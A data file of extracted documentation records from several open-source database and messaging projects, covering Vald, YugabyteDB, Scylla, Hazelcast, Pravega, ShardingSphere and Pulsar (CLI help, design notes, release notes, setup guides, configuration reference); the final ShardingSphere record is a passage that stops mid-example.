{ "category": "App Definition and Development", "file_name": "template.md", "project_name": "Vald", "subcategory": "Database" }
[ { "data": "<!-- introduction sentence --> `image-name` is the XXX for vald-XXX-YYY. The responsibility of this image is XXX. <!-- FIXME: document URL --> For more details, please refer to the . <div align=\"center\"> <img src=\"https://github.com/vdaas/vald/blob/main/assets/image/readme.svg?raw=true\" width=\"50%\" /> </div> ](https://hub.docker.com/r/vdaas/vald-agent-ngt/tags?page=1&name=latest) ](https://opensource.org/licenses/Apache-2.0) ](https://github.com/vdaas/vald/releases/latest) ](https://twitter.com/vdaas_vald) <!-- FIXME: If image has some requirements, describe here with :warning: emoji --> CPU instruction: requires `AVX2` or `AVX512` RAM: XXX Image: XXX External components: S3 CPU instruction: requires `AVX2` or `AVX512` RAM: XXX Image: XXX External components: S3 This image does NOT support running on M1/M2 Mac. <!-- Get Started --> <!-- Vald Agent NGT requires more chapter Agent Standalone --> `image-name` is used for one of the components of the Vald cluster, which means it should be used on the Kubernetes cluster, not the local environment or Docker. Please refer to the for deploying the Vald cluster. | tag | linux/amd64 | linux/arm64 | description | | : | :: | :: | : | | latest | | | the latest image is the same as the latest version of repository version. | | nightly | | | the nightly applies the main branch's source code of the repository. | | vX.Y.Z | | | the vX.Y.Z image applies the source code of the repository. | | pr-XXX | | | the pr-XXX image applies the source code of the pull request XXX of the repository. | <!-- FIXME --> The `Dockerfile` of this image is . <!-- About Vald Project --> <!-- This chapter is static --> The information about the Vald project, please refer to the following: We're love to support you! Please feel free to contact us anytime with your questions or issue reports. This product is under the terms of the Apache License v2.0; refer file." } ]
{ "category": "App Definition and Development", "file_name": "yba_task_list.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "List YugabyteDB Anywhere tasks List YugabyteDB Anywhere tasks ``` yba task list [flags] ``` ``` --task-uuid string [Optional] UUID of the task. -h, --help help for list ``` ``` -a, --apiToken string YugabyteDB Anywhere api token. --config string Config file, defaults to $HOME/.yba-cli.yaml --debug Use debug mode, same as --logLevel debug. --disable-color Disable colors in output. (default false) -H, --host string YugabyteDB Anywhere Host (default \"http://localhost:9000\") -l, --logLevel string Select the desired log level format. Allowed values: debug, info, warn, error, fatal. (default \"info\") -o, --output string Select the desired output format. Allowed values: table, json, pretty. (default \"table\") --timeout duration Wait command timeout, example: 5m, 1h. (default 168h0m0s) --wait Wait until the task is completed, otherwise it will exit immediately. (default true) ``` - Manage YugabyteDB Anywhere tasks" } ]
{ "category": "App Definition and Development", "file_name": "per-partition-rate-limit.md", "project_name": "Scylla", "subcategory": "Database" }
[ { "data": "Scylla clusters operate best when the data is spread across a large number of small partitions, and reads/writes are spread uniformly across all shards and nodes. Due to various reasons (bugs, malicious end users etc.) this assumption may suddenly not hold anymore and one partition may start getting a disproportionate number of requests. In turn, this usually leads to the owning shards being overloaded - a scenario called \"hot partition\" - and the total cluster latency becoming worse. The per partition rate limit feature allows users to limit the rate of accepted requests on a per-partition basis. When a partition exceeds the configured limit of operations of given type (reads/writes) per second, the cluster will start responding with errors to some of the operations for that partition so that, statistically, the rate of accepted requests is kept at the configured limit. Rejected operations use less resources, therefore this feature can help in the \"hot partition\" situation. NOTE: this is an overload protection mechanism and may not be used to reliably enforce limits in some situations. Due to Scylla's distributed nature, the actual number of accepted requests depends on the cluster and driver configuration and may be larger by a factor of RF (keyspace's replication factor). It is recommended to set the limit to a value an order of magnitude larger than the maximum expected per-partition throughput. See the section for more information. Per-partition limits are set separately for reads and writes, on a per-table basis. Limits can be set with the `perpartitionrate_limit` extension when CREATE'ing or ALTER'ing a table using a schema extension: ```cql ALTER TABLE ks.tbl WITH perpartitionrate_limit = { 'maxreadsper_second': 123, 'maxwritesper_second': 456 }; ``` Both `maxreadspersecond` and `maxwritespersecond` are optional - omitting one of them means \"no limit\" for that type of operation. Rejected operations are reported as an ERROR response to the driver. If the driver supports it, the response contains a scylla-specific error code indicating that the operation was rejected. For more details about the error code, see the section in the `protocol-extensions.md` doc. If the driver doesn't support the new error code, the `Config_error` code is returned instead. The code was chosen in order for the retry policies of the drivers not to retry the requests and instead propagate them directly to the users. Accounting related to tracking per-partition limits is done by replicas. Each replica keeps a map of counters which are identified by a combination of (token, table, operation type). When the replica accounts an operation, it increments the relevant counter. All counters are halved every second. Depending on whether the coordinator is a replica or not, the flow is a bit different. Here, \"coordinator == replica\" requirement also means that the operation is handled on the correct shard. Only reads and writes explicitly issued by the user are counted to the limit. Read repair, hints, batch replay, CDC preimage query and internal system queries are not counted to the limit. Paxos and counters are not covered in current implementation. Coordinator generates a random number from range `[0, 1)` with uniform distribution and sends it to replicas along with the operation request. 
Each replica accounts the operation and then calculates a rejection threshold based on the local counter" }, { "data": "If the number received from the coordinator is above the threshold, the operation is rejected. The assumption is that all replicas will converge to similar counter values. Most of the time they will agree on the decision and not much work will be wasted due to some replicas accepting and other rejecting. As before, the coordinator generates a random number. However, it does not send requests to replicas immediately but rather calculates local rejection threshold. If the number is above threshold, the whole operation is skipped and the operation is only accounted on the coordinator. Otherwise, coordinator proceeds with sending the requests, and replicas are told only to account the operation but never reject it. This strategy leads to no wasted replica work. However, when the coordinator rejects the operation other replicas do not account it, so it may lead to a bit more requests being accepted (but still not more than `RF * limit`). Let's assume the simplest case where there is only one replica. It will increment its counter on every operation. Because all counters are halved every second, assuming the rate of `V` ops/s the counter will eventually oscillate between `V` and `2V`. If the limit is `L` ops/s, then we would like to admit only `L` operation within each second - therefore the probability should satisfy the following: ``` L = Sum(i = V..2V) { P(i) } ``` This can be approximated with a definite integral: ``` L = Int(x = V..2V) { P(x) } ``` A solution to this integral is: ``` P(x) = L / (x * ln 2) ``` where `x` is the current value of the counter. This is the formula used in the current implementation. In practice, RF is rarely 1 so there is more than one replica. Depending on the type of the operation, this introduces some inaccurracies in counting. Writes are counted relatively well because all live replicas participate in a write operation, so all replicas should have an up-to-date counter value. Because of the \"coordinator is replica\" case, rejected writes will not be accounted on all replicas. In tests, the amount of accepted operations was quite close to the limit and much less than the theoretical `RF * limit`. Reads are less accurate because not all replicas may participate in a given read operation (this depends on CL). In the worst case of CL=ONE and round-robin strategy, up to `RF * limit` ops/s will be accepted. Higher consistencies are counted better, e.g. CL=ALL - although they are also susceptible to the inaccurracy introduced by \"coordinator is replica\" case. In case of non-shard-aware drivers, it is best to keep the clocks in sync. When the coordinator is not a replica, each replica decides whether to accept or not, based on the random number sent by coordinator. If the replicas have their clocks in sync, then their per-partition counters should have close values and they will agree on the decision whether to reject or not most of the time. If not, they will disagree more frequently which will result in wasted replica work and the effective rate limit will be lower or higher, depending on the consistency. In the worst case, it might be 30% lower or 45% higher than the real limit." } ]
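To make the admission formula above concrete, here is a rough, self-contained Python sketch of a single replica's counter. It is not Scylla's implementation, only an illustration of the halving counter and the acceptance probability `P(x) = L / (x * ln 2)`:

```python
import math
import random

def acceptance_probability(counter: float, limit: float) -> float:
    """P(x) = L / (x * ln 2), clamped to [0, 1]."""
    if counter <= 0:
        return 1.0
    return min(1.0, limit / (counter * math.log(2)))

def simulate(ops_per_second: int, limit: int, seconds: int = 30) -> float:
    counter = 0.0
    accepted = 0
    for _ in range(seconds):
        counter /= 2  # all counters are halved every second
        for _ in range(ops_per_second):
            counter += 1  # the replica accounts every operation, accepted or not
            # the coordinator's uniform random number is compared against the threshold
            if random.random() < acceptance_probability(counter, limit):
                accepted += 1
    return accepted / seconds

# A partition doing 1000 ops/s against a 100 ops/s limit should see roughly
# 100 accepted operations per second once the counter stabilises.
print(simulate(ops_per_second=1000, limit=100))
```

With a workload well above the limit, the accepted rate settles near the configured `L`, which matches the derivation above; at rates below roughly `L / ln 2` the threshold clamps to 1 and nothing is rejected.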
{ "category": "App Definition and Development", "file_name": "002-job-level-serialization.md", "project_name": "Hazelcast IMDG", "subcategory": "Database" }
[ { "data": "title: 002 - Job-level Serialization description: Make it possible to add serializer per job Since: 4.1 Be able to run jobs with context scoped custom serializers - in particular it should be possible to configure two different serializers for a given data type on two different jobs. Assuming we want to allow users to add their hand written serializers to a given job we could extend `JobConfig` API: ```java new JobConfig().addSerializer(Value.class, ValueSerializer.class) ``` More complex serializers - i.e. a custom one implementing Avro serialization - might require additional resources, those could be added via existing `add[Class|Jar]`: ```java new JobConfig() .addSerializer(Value.class, ValueSerializer.class) .addJar(\"/file/serialization-library.jar\") ``` All the serialization classes/jars could be then uploaded to jobs `IMap`, similarly to how is it done for other resources via `JobRepository`. That would allow reusing existing class loading mechanism and make sure resources are cleaned up on job completion. Currently all the serializers are registered up front, before cluster startup. Moreover, they are all public scoped - they are accessible for all the jobs running in a given cluster - which forbids different serializers for same data type on a different job. There are couple of ways we could support job level serializers: Extend `SerializationService` to allow runtime registration and de-registration of serializers. Moreover, we would need to add the possibility to lookup serializers not only by class but also by something like a tuple of job id and a class. Duplicate the `SerializationService` for each job. That would also require extending `SerializationService` to allow runtime registration of serializers. However, it lets us use existing serializer lookup mechanism. Create new `SerializationService` with job level only serializers which would fallback to public `SerializationService`. All above require to some extent API changes in IMDG `SerializationService`. Registering serializers in runtime would introduce the possibility to create a simpler `JobLevelSerializer` interface - without the need to declare type id and necessity to manage it. For instance: ```java public interface Codec<T> { void encode(T value, DataOutput output) throws IOException; T decode(DataInput input) throws IOException; } ``` However, that's another interface in already overcrowded universe of Hazelcast serialization interfaces so whether it is valuable or not is questionable. Another thing is that most probably it could not be used to work with data types stored in IMDG. Going with 1. would require changing code in each Jet's `SerializationService` call site - altering not only the way lookup is performed but also making sure job id is available in there. Going with 2. or" }, { "data": "requires spawning a new `SerializationService` per job and hooking it up (at least) in: `SenderTasklet` `ReceiverTasklet` `OutboxImpl` `ExplodeSnapshotP` Each job execution gets its own `SerializationService` which encapsulates job-level serializers and falls back to cluster `SerializationService`. Job-level serializers can be used to read/write data from/to local IMDG `Observable`s, `List`s, `Map`s & `Cache`s. Job-level `SerializationService` serializers have precedence over any cluster serializers - if type `A` have serializers registered on both levels, cluster and job, the latter will be chosen for given job. 
`JobConfig` has been extended with: ```java / Registers the given serializer for the given class for the scope of the job. It will be accessible to all the code attached to the underlying pipeline or DAG, but not to any other code. (An important example is the {@code IMap} data source, which can instantiate only the classes from the Jet instance's classpath.) <p> Serializers registered on a job level have precedence over any serializer registered on a cluster level. <p> Serializer must have no-arg constructor. * @return {@code this} instance for fluent API @since 4.1 */ @Nonnull @EvolvingApi public <T, S extends StreamSerializer<?>> JobConfig registerSerializer(@Nonnull Class<T> clazz, @Nonnull Class<S> serializerClass) { Preconditions.checkFalse(serializerConfigs.containsKey(clazz.getName()), \"Serializer for \" + clazz + \" already registered\"); serializerConfigs.put(clazz.getName(), serializerClass.getName()); return this; } ``` Given sample value class and its serializer: ```java class Value { public static final int TYPE = 1; private Integer v; public Value(Integer v) { this.v = v; } } class ValueSerializer implements StreamSerializer<Value> { @Override public int getTypeId() { return Value.TYPE; } @Override public void write(ObjectDataOutput objectDataOutput, Value value) throws IOException { objectDataOutput.writeInt(value.v); } @Override public Value read(ObjectDataInput objectDataInput) throws IOException { return new Value(objectDataInput.readInt()); } } ``` one registers them with `JobConfig`, the following way (`registerSerializer()` does not add classes to the classpath, we have other means to do that, see `addClass()`, `addJar()` etc): ```java JobConfig jobConfig = new JobConfig() .addClass(Value.class, ValueSerializer.class) .registerSerializer(Value.class, ValueSerializer.class) ``` Each job execution gets its own job-level `SerializationService`. It would be beneficial to add a soak test to make sure that nothing is leaking when there are thousands of jobs running with job-level serializers. Job-level serializers are used to serialize objects between distributed edges & to/from snapshots. They can also be used to read/write data from/to local IMDG data structures. However, if you want to work with them outside of the job, you have to register compatible serializers on a cluster level as well. Moreover, following functionalities are not currently supported: querying `Map`s (reading from an `IMap` with user defined predicates & projections) merging/updating `Map`s streaming `Journal` data Allow job-level serializers to be used with remote IMDG data structures. Allow job-level serializers to: query `Map`s merge/update `Map`s stream `Journal` data" } ]
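To show how the pieces fit together end to end, here is a minimal, hypothetical submission sketch. It assumes the Jet 4.x pipeline API (`Jet.bootstrappedInstance()`, `TestSources.items()`, `Sinks.logger()`) and reuses the `Value` and `ValueSerializer` classes shown above; treat it as an illustration of wiring a job-level serializer into a job, not as production code:

```java
import com.hazelcast.jet.Jet;
import com.hazelcast.jet.JetInstance;
import com.hazelcast.jet.config.JobConfig;
import com.hazelcast.jet.pipeline.Pipeline;
import com.hazelcast.jet.pipeline.Sinks;
import com.hazelcast.jet.pipeline.test.TestSources;

public class JobLevelSerializerExample {
    public static void main(String[] args) {
        // Make the classes available to the job and register the job-level serializer.
        JobConfig jobConfig = new JobConfig()
                .addClass(Value.class, ValueSerializer.class)
                .registerSerializer(Value.class, ValueSerializer.class);

        // Trivial pipeline: Value objects crossing distributed edges or written to
        // snapshots are serialized with the job-level ValueSerializer.
        Pipeline pipeline = Pipeline.create();
        pipeline.readFrom(TestSources.items(1, 2, 3))
                .map(Value::new)
                .writeTo(Sinks.logger());

        JetInstance jet = Jet.bootstrappedInstance();
        jet.newJob(pipeline, jobConfig).join();
    }
}
```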
{ "category": "App Definition and Development", "file_name": "getting-started.md", "project_name": "Pravega", "subcategory": "Streaming & Messaging" }
[ { "data": "<!-- Copyright Pravega Authors. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> The best way to get to know Pravega is to start it up and run a sample Pravega application. Verify the following prerequisite ``` Java 11 ``` Download Pravega Download the Pravega release from the . If you prefer to build Pravega yourself, you can download the code and run `./gradlew distribution`. More details are shown in the Pravega . ``` $ tar xfvz pravega-<version>.tgz ``` Run Pravega in standalone mode This launches all the components of Pravega on your local machine. Note: This is for testing/demo purposes only, do not use this mode of deployment in Production! In order to remotely troubleshoot Java application, JDWP port is being used. The default JDWP port in Pravega(8050) can be overridden using the below command before starting Pravega in standalone mode. 0 to 65535 are allowed range of port numbers. ``` $ export JDWP_PORT=8888 ``` More options and additional ways to run Pravega can be found in guide. ``` $ cd pravega-<version> $ ./bin/pravega-standalone ``` The command above runs Pravega locally for development and testing purposes. It does not persist in the storage tiers like we do with a real deployment of Pravega and as such you shouldn't expect it to recover from crashes, and further, not rely on it for production use. For production use, we strongly encourage a full deployment of Pravega. We have developed a few samples to introduce the developer to coding with Pravega here: . Download and run the \"Hello World\" Pravega sample reader and writer applications. Pravega dependencies will be pulled from maven central. Note: The samples can also use a locally compiled version of Pravega. For more information, please see the note on maven publishing. Download the Pravega-Samples git repo ``` $ git clone https://github.com/pravega/pravega-samples $ cd pravega-samples ``` Generate the scripts to run the applications ``` $ ./gradlew installDist ``` Run the sample \"HelloWorldWriter\" This runs a simple Java application that writes a \"hello world\" message as an event into a Pravega stream. ``` $ cd pravega-samples/pravega-client-examples/build/install/pravega-client-examples $ ./bin/helloWorldWriter ``` Example HelloWorldWriter output ``` ... Writing message: 'hello world' with routing-key: 'helloRoutingKey' to stream 'examples / helloStream' ... ``` See the file in the standalone-examples for more details on running the HelloWorldWriter with different parameters. Run the sample \"HelloWorldReader\" ``` $ cd pravega-samples/pravega-client-examples/build/install/pravega-client-examples $ ./bin/helloWorldReader ``` Example HelloWorldReader output ``` ... Reading all the events from examples/helloStream ... Read event 'hello world' No more events from examples/helloStream ... ``` See the file in the pravega-client-examples for more details on running the HelloWorldReader application. 
Serializers: The Java client has multiple built-in serializers: `UTF8StringSerializer`, `ByteArraySerializer`, `ByteBufferSerializer`, and `JavaSerializer`. Additional pre-made serializers are available in: https://github.com/pravega/pravega-serializer You can also write your own implementation of the `Serializer` interface." } ]
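As a small illustration of the last point, the sketch below implements a custom serializer for plain `Integer` events, assuming the `Serializer` interface exposes `serialize`/`deserialize` over `ByteBuffer` as the built-in serializers do:

```java
import io.pravega.client.stream.Serializer;

import java.nio.ByteBuffer;

// Illustrative only: a custom Serializer for plain Integer events.
public class IntSerializer implements Serializer<Integer> {

    @Override
    public ByteBuffer serialize(Integer value) {
        // Write at index 0 so the returned buffer is ready to be read from position 0.
        return ByteBuffer.allocate(Integer.BYTES).putInt(0, value);
    }

    @Override
    public Integer deserialize(ByteBuffer serializedValue) {
        return serializedValue.getInt();
    }
}
```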
{ "category": "App Definition and Development", "file_name": "ss_5.0.0beta.en.md", "project_name": "ShardingSphere", "subcategory": "Database" }
[ { "data": "+++ title = \"Following 6 months of development Apache ShardingSphere 5.0.0-beta has been officially released!\" weight = 14 chapter = true +++ As an Apache top-level project, ShardingSphere goes through community verification, voting and many other steps before it can be released. Such steps ensure the release is compliant with the Apache Release License specifications, and meeting the users expectations set for the 5.0.0-beta milestone. The current versions architecture has been completed and the version is officially available. SQL is a database query programming language for accessing, querying, updating, and managing relational database systems. Most of the existing general database systems tend to rewrite and extend SQL to better fit their own database system with higher flexibility and functionality. DistSQL (Distributed SQL) is a special built-in language proposed by Apache ShardingSphere providing additional functional operation capability in comparison to the standard SQL. Users can use ShardingSphere just like other database systems with DistSQL, therefore no longer positioning ShardingSphere as a middleware architecture for programmers, but also making it transferable to an infrastructure product for operation and maintenance. ShardingSphere currently includes three types of DistSQL including RDL, RQL and RAL: RDL (Resource & Rule Definition Language): create, modify and delete resources and rules. RQL (Resource & Rule Query Language): query and show resources and rules. RAL (Resource & Rule Administration Language): hint, distributed transaction switching, distributed query execution plan and other incremental functions. ShardingSphere proposes the concept of Database Plus, empowering traditional databases to build a highly secure & enhanced distributed database ecosystem, by leveraging open-source database system software such as MySQL and PostgreSQL, while at the same time meeting practical business needs. The distributed SQL used with this distributed database system converts ShardingSphere-Proxy from a YAML configuration driven middleware to a SQL driven distributed database system. In the 5.0.0-beta, users can easily initiate ShardingSphere-Proxy and use DistSQL to dynamically create, modify, delete sharding tables, encrypt tables, and dynamically inject instances of database resources, create read-write-splitting strategies, show all the configurations and distributed transaction types, engage in dynamic migration of distributed database tables etc. DistSQL allows users to query and manage all database resources and ShardingSpheres distributed metadata in a standardized and familiar way. In the future DistSQL will further redefine the boundary between Middleware and database, allowing users to leverage ShardingSphere as if they were using a database natively. PostgreSQL is widely considered to be the most powerful enterprise-level open-source database. ShardingSphere clients include ShardingSphere-JDBC and ShardingSphere-Proxy, with ShardingSphere-Proxy containing both MySQL and PostgreSQL. As PostgreSQL has greatly matured and become increasingly adopted, the ShardingSphere team has directed its attention to the PostgreSQL proxy. This release has greatly improved PostgreSQL in its SQL parsing and compatibility layers, protocol access and permission control layers. 
The improved version of ShardingSphere-Proxy PostgreSQL is this releases main feature and will be continuously improved in the future as it marks the beginning of compatibility with the open-source" }, { "data": "In the future, ShardingSphere PostgreSQL-Proxy will not only provide sharding and security distributed solutions to users, but also fine-grained authentication, data access control etc. Pluggable architecture pursues the independence and non-awareness of each module through a highly flexible, pluggable and extensible kernel. These functions are combined in a super positional manner. In ShardingSphere, many functional implementation classes are loaded by inserting SPIs (Service Provider Interface). SPI APIs for third party implementation or extension, can be used for architecture extension or component substitution. Currently data sharding, Readwrite-splitting, data encryption, Shadow databases, instance exploration and other functions including the protocol implementations of MySQL, PostgreSQL, SQLServer, Oracle and other SQL and protocol support can be installed into ShardingSphere as plug-ins. ShardingSphere now offers dozens of SPIs as extension points for the system, and the number is still growing. Pluggable architectures improvement effectively evolves ShardingSphere into a distributed database ecosystem. The pluggable and extensible concepts provide a customized combinational database solution that can be built upon with Lego-like blocks. For example, traditional relational databases can be scaled out and encrypted at the same time, while distributed database solutions can be built independently. ShardingSphere provides automated probes to effectively separate observability from the main functionality. This brings significant convenience for user-customized tracing, metrics, and logging. OpenTracing, Jaeger, Zipkin based tracing probes and Prometheus Metrics probes, as well as a default logging implementation also have built-in implementations. Join and sub queries for cross-database instances are some of the most cumbersome issues. Using traditional database middleware could limit business level functionality - therefore SQLs application scope needs to be considered by R&D personnel. This release enhances distributed query functionality which supports join queries and sub-queries across different database instances. At the same time it greatly improves compatibility between supported SQL cases for MySQL/PostgreSQL/Oracle/SQLServer in distributed scenarios through SQL parsing, routing, and execution level enhancements and bug fixing. The improvements in this release allow users to achieve a smooth transition from a traditional database cluster to a distributed database cluster with low risk, high efficiency and zero transformation by introducing ShardingSphere. Currently, distributed query capability enhancement is still in the POC stage, with room for improvement in terms of performance. The community is warmly encouraged to participate in the co-development. User security and permission control some of the most important functions in a database field. Although simple password setting and database-level access control at the library level were already provided in the 5.0.0-alpha, these features have now been further upgraded. This update changes the password setting from using configuration file to using standard SQL online to create and update distributed users and their access permissions. 
Whether you were using MySQL, PostgreSQL or OpenGauss in your business scenario, you can continue to use your native database SQL dialect. Username, hostname, password, library, table and other free combination of authority control management can be used in ShardingSpheres distributed system. ShardingSphere-Proxy's Proxy access mode enables users to migrate their original database permissions and user systems" }, { "data": "In future releases, access control at the column level, view level, and even the possibility for functions to limit access for each row of data will be provided. ShardingSphere also provides access to third-party business systems or user-specific security systems, allowing ShardingSphere-Proxy to connect with third-party security control systems and provide the most standard database access management mode. The permission module is currently in the development stage, and the finalized functions will be presented in the next version. ShardingSphere's pluggable architecture provides users with rich scalable capabilities with common functions already built-in, to increase ease of use. For example, database and table sharding strategy is preset with hash sharding, time range sharding, module sharding and other strategies. Data encryption is preset with AES, RC4, MD5 encryption. To further simplify operation, powerful new distSQL capability allows users to dynamically create a sharded or encrypted table online with a single SQL. To satisfy more complex scenarios, ShardingSphere also provides the strategy interfaces for related algorithms allowing users to implement more complicated functionalities for their own business scenarios. The coexistence philosophy of built-in strategies for users general needs, and specific scenarios corresponding interfaces has always been the architectural design philosophy of ShardingSphere. Startup time issues could be encountered when launching ShardingSpheres previous versions, especially in the occurrence involving thousands of servers - since ShardingSphere helps users manage all database instances and metadata information. With this release, significant performance tuning and several architectural tweaks are introduced to specifically address the community's metadata loading issues. Differently from the original JDBC driver loading mode, the parallel SQL query mode for different database dialects takes out all metadata information at a single time, thus greatly improving startup performance. In the process of constantly improving and developing new functions, ShardingSphere had previously lacked a complete and comprehensive integration & performance testing system, which can ensure that every commit be compiled normally without affecting other modules and can observe upward and downward performance trends. With this release, integration tests have also been included to ensure data sharding, data encryption, Readwrite-splitting, distributed management and control, access control, SQL support and other functions. The system provides basic guarantees for monitoring and tuning performance across databases, different sharding or encryption strategies, and different versions. With this release, relevant performance test reports and dashboard will also be developed for the community, allowing users to observe ShardingSpheres performance changes. The entire test system source code will be made available to the community to facilitate user test deployment. 
In addition to above mentioned features, for a comprehensive list of enhancements, performance optimizations, bug fixes etc. please refer to the list below: New DistSQL for loading and presenting ShardingSpheres configuration. Support for join queries and sub-queries across different databased instances. Data gateway is added to support heterogeneous databases. Support create and modify user permission online or dynamically. New automated probes module. API in read and write splitting module configuration changed to read-write-splitting. API for ShardingProxy user permission configuration changed to" }, { "data": "Using dataSourceClassName to optimize the dataSource configuration of ShardingJDBC. Automated ShardingTable configuration strategy, provide standard built-in shard table. Removed ShardingProxy acceptor-size configuration option. Added built-in shard algorithm SPI so users can set up the shard algorithm through class name like in the version 4.x. Startup metadata loading performance has been significantly improved. Greatly enhanced the parsing abilities for Oracle/SQLServer/PostgreSQL database. Supporting initialization of the user permission MySQL/PostgreSQL/SQLServer/Oracle. Supporting DDL language for data encryption. When sharding and encryption are used together, SQL is supported for modifying the table named owner. Using SELECT* to rewrite SQL, overwrite columns to add escape characters to avoid column conflicts with keywords. Supporting PostgreSQL JSON/JSONB/ for pattern matching operator parsing. Supporting MySQL/PostgreSQL CREATE/ALTER/DROP TABLESPACE. Supporting PostgreSQL PREPARE, EXECUTE, DEALLOCATE. Supporting PostgreSQL EXPLAIN. Supporting PostgreSQL START/END TRANSACTION. Supporting PostgreSQL ALTER/DROP INDEX. Supporting PostgreSQL dialect CREATE TABLESPACE. Supporting MySQL CREATE LOADABLE FUNCTION. Supporting MySQL/PostgreSQL ALTER TABLE RENAME. Supporting PostgreSQL protocol Close command. New registry storage structure. Removed support for NACOS and Apollo's Configuration Centre. ShardingScaling introduces ElasticJob to handle migration tasks. Refactoring the storage and online update of the kernel metadata information. Fixed issue where SELECT * wildcard SQL could not be used for read/write separation. The custom sharding algorithm did not match the configuration type and the class instance did not meet expectations issue is fixed. Fixed the NoSuchTableException when executing DROP TABLE IF EXISTS. Fixed UPDATE ... SET ... rewrite error. Fixed CREATE/ALTER TABLE statement using foreign key to reference TABLE overwrite error. Fixed the issue when querying subqueries in the temporal table field verification exception. Fixed Oracle/SQL92 SELECT ... WHERE ... LIKE class cast exception. Fixed MySQL SELECT EXISTS ... FROM ... parsing exception. Fixed SHOW INDEX result exception. Fixed the rewrite and merge result exception for SELECT... GROUP BY ... Fixed the encryption and decryption error for CREATE TABLE rewrite. Fixed issue with PostgreSQL Proxy reading text parameter values incorrectly. Fixed PostgreSQL Proxy support for array objects. Fixed ShardingProxy Datatype conversion issues. PostgreSQL Proxy supports the use of the Numeric type. Fixed the issue with incorrect Tag for PostgreSQL Proxy transactions related to Command Complete. Fixed the issue that might return packets that were not expected by the client. 
Download Link: <https://shardingsphere.apache.org/document/current/en/downloads/> Update Logs: <https://github.com/apache/shardingsphere/blob/master/RELEASE-NOTES.md> Project Address: <https://shardingsphere.apache.org/> Mailing List: <https://shardingsphere.apache.org/community/en/involved/subscribe/> The release of Apache ShardingSphere 5.0.0-beta could not have happened without the outstanding support and contribution of the community. Since the 5.0.0-alpha release until now, 41 contributors have contributed 1574 PR, enhanced the optimization, iteration, and the release of ShardingSphere 5.0.0. Pan Juan | Trista SphereEx co-founder, Apache member, Apache ShardingSphere PMC, Apache brpc (Incubating) mentor, Release manager. Senior DBA at JD Technology, she was responsible for the design and development of JD Digital Science and Technology's intelligent database platform. She now focuses on distributed database & middleware ecosystem, and the open-source community. Recipient of the \"2020 China Open-Source Pioneer\" award, she is frequently invited to speak and share her insights at relevant conferences in the fields of database & database architecture. GitHub: <https://tristazero.github.io>" } ]
{ "category": "App Definition and Development", "file_name": "yba.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "yba - Command line tools to manage your YugabyteDB Anywhere (Self-managed Database-as-a-Service) resources. YugabyteDB Anywhere is a control plane for managing YugabyteDB universes across hybrid and multi-cloud environments, and provides automation and orchestration capabilities. YugabyteDB Anywhere CLI provides ease of access via the command line. ``` yba [flags] ``` ``` -a, --apiToken string YugabyteDB Anywhere api token. --config string Config file, defaults to $HOME/.yba-cli.yaml --debug Use debug mode, same as --logLevel debug. --disable-color Disable colors in output. (default false) -h, --help help for yba -H, --host string YugabyteDB Anywhere Host (default \"http://localhost:9000\") -l, --logLevel string Select the desired log level format. Allowed values: debug, info, warn, error, fatal. (default \"info\") -o, --output string Select the desired output format. Allowed values: table, json, pretty. (default \"table\") --timeout duration Wait command timeout, example: 5m, 1h. (default 168h0m0s) --wait Wait until the task is completed, otherwise it will exit immediately. (default true) ``` - Authenticate yba cli - Manage YugabyteDB Anywhere backups - Generate the autocompletion script for the specified shell - Authenticate yba cli using email and password - Manage YugabyteDB Anywhere providers - Register a YugabyteDB Anywhere customer using yba cli - Manage YugabyteDB Anywhere storage configurations - Manage YugabyteDB Anywhere tasks - Manage YugabyteDB Anywhere universes - Manage YugabyteDB version release" } ]
{ "category": "App Definition and Development", "file_name": "pip-276.md", "project_name": "Pulsar", "subcategory": "Streaming & Messaging" }
[ { "data": "The metrics are all started with `pulsar_`, so that both users and operators can quickly find the metrics of the entire system through this prefix. However, due to some other reasons, it was found that `topicloadtimes` was missing the prefix, so want to get it right. In master branch, keep the old metric `topicloadtimes` and add below new metrics: `pulsartopicload_times` After release-3.1.0, remove ``topicloadtimes`. Add new metrics: `pulsartopicload_times` : The topic load latency calculated in milliseconds After this PIP, users can use `topicloadtimes` and `pulsartopicload_times` to monitor topic load times. <!-- Updated afterwards --> Mailing List discussion thread: https://lists.apache.org/thread/fcg3f5mm2640fxq4cj8pz6n3lso293f8 Mailing List voting thread: https://lists.apache.org/thread/vky6jcn0llx56599fgo73dh6cxfpmxsm" } ]
{ "category": "App Definition and Development", "file_name": "mix.en.md", "project_name": "ShardingSphere", "subcategory": "Database" }
[ { "data": "+++ title = \"Mixed Rules\" weight = 10 +++ ShardingSphere provides a variety of features, such as data sharding, read/write splitting, and data encryption. These features can be used independently or in combination. Below, you will find the parameters' explanation and configuration samples based on YAML. ```yaml rules: !SHARDING tables: <logictablename>: # Logical table name: actualDataNodes: # consists of logical data source name plus table name (refer to Inline syntax rules) tableStrategy: # Table shards strategy. The same as database shards strategy standard: shardingColumn: # Sharding column name shardingAlgorithmName: # Sharding algorithm name keyGenerateStrategy: column: # Auto-increment column name. By default, the auto-increment primary key generator is not used. keyGeneratorName: # Distributed sequence algorithm name defaultDatabaseStrategy: standard: shardingColumn: # Sharding column name shardingAlgorithmName: # Sharding algorithm name shardingAlgorithms: <shardingalgorithmname>: # Sharding algorithm name type: INLINE props: algorithm-expression: # INLINE expression torderinline: type: INLINE props: algorithm-expression: # INLINE expression keyGenerators: <keygeneratealgorithm_name> (+): # Distributed sequence algorithm name type: # Distributed sequence algorithm type props: # Property configuration of distributed sequence algorithm !ENCRYPT encryptors: <encryptalgorithmname> (+): # Encryption and decryption algorithm name type: # Encryption and decryption algorithm type props: # Encryption and decryption algorithm property configuration <encryptalgorithmname> (+): # Encryption and decryption algorithm name type: # Encryption and decryption algorithm type tables: <table_name>: # Encryption table name columns: <column_name> (+): # Encrypt logic column name cipher: name: # Cipher column name encryptorName: # Cipher encrypt algorithm name assistedQuery (?): name: # Assisted query column name encryptorName: # Assisted query encrypt algorithm name likeQuery (?): name: # Like query column name encryptorName: # Like query encrypt algorithm name ``` ```yaml rules: !SHARDING tables: t_order: actualDataNodes: replicads${0..1}.torder${0..1} tableStrategy: standard: shardingColumn: order_id 